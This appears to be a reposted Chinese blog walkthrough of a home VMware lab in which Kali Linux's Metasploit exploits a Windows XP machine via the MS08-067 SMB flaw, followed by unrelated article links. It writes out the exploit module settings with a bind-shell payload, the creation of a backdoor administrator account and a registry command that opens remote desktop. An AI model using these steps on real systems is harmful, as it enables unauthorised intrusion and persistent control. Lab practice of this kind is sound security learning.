MSF初体验 - kali linux 入侵XP系统
最近做某安全竞赛平台的比赛,真正开始接触Metasploit这一渗透神器,同时也是装逼神器(2333….),下面记录一下初步使用Metasploit的过程。
首先在百度百科摘录了一段关于Metasploit Framework 的简要介绍。
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
Metasploit的设计初衷是打造成一个攻击工具开发平台,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。
说再多也不如真情实弹的干不是。
我用VMware搭建了一个实验环境,下面是网络的拓扑图:
要做的就是用Kali Linux里的Metasploit入侵WinXP,然后从物理机,也就是Win7的远程桌面连进WinXP 系统。
首先,在Kali用命令 msfconsole 开启Metasploit。
然后运行如下命令:
use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻击程序
set LHOST 192.168.116.3 #设置本地主机IP
set RHOST 192.168.116.116 #设置目标主机IP
set payload windows/shell_bind_tcp #设置payload
show options #查看设置信息
exploit #实施攻击
由图可知,攻击成功,我们得到了一个cmdshell,接下来就是新建账户了。
添加用户名为zeal,密码为zeal的用户,并把zeal用户添加到管理组。
接下来执行命令 netstat -an 看一下目标主机开放端口的情况。
发现并没有开启3389(远程桌面连接端口),我们需要手动开启。需要执行命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
然后,我们在物理机(Win7)运行 mstsc进行远程桌面连接。
OK,成功入侵目标主机。
Metasploit 就是一款这么强大的工具,使渗透测试人员如虎添翼,几个命令就入侵了目标主机。它的强大功能不言而喻。
接下来,我会继续研究Metasploit的使用,并记录自己的学习过程,希望能给各位一定的帮助。
转自http://tieba.baidu.com/p/3715441716
最新文章
- BeautifulSoup研究一
- java 过滤表情符号
- Oracle数据库查看当前数据库版本的方法
- 关于RSS
- Android Studio 打包及引用 aar
- Red5空项目的理解
- IOS面试攻略
- java实例变量及方法调用顺序
- POJ1094 Sorting It All Out(拓扑排序)
- 自动化测试:behave
- 多线程编程学习四(Lock 的使用).
- python3之模块
- Netty入门教程——认识Netty
- js-图片时间困难版(倒计时)
- webApp 页面适配布局
- 2017-2018 ACM-ICPC, NEERC, Moscow Subregional Contest B - Byteland Trip dp
- Spring bean作用域
- 对java中继承、接口、组合的思考
- BZOJ1034 [ZJOI2008]泡泡堂BNB 【贪心】
- Docker学习笔记_安装和使用mysql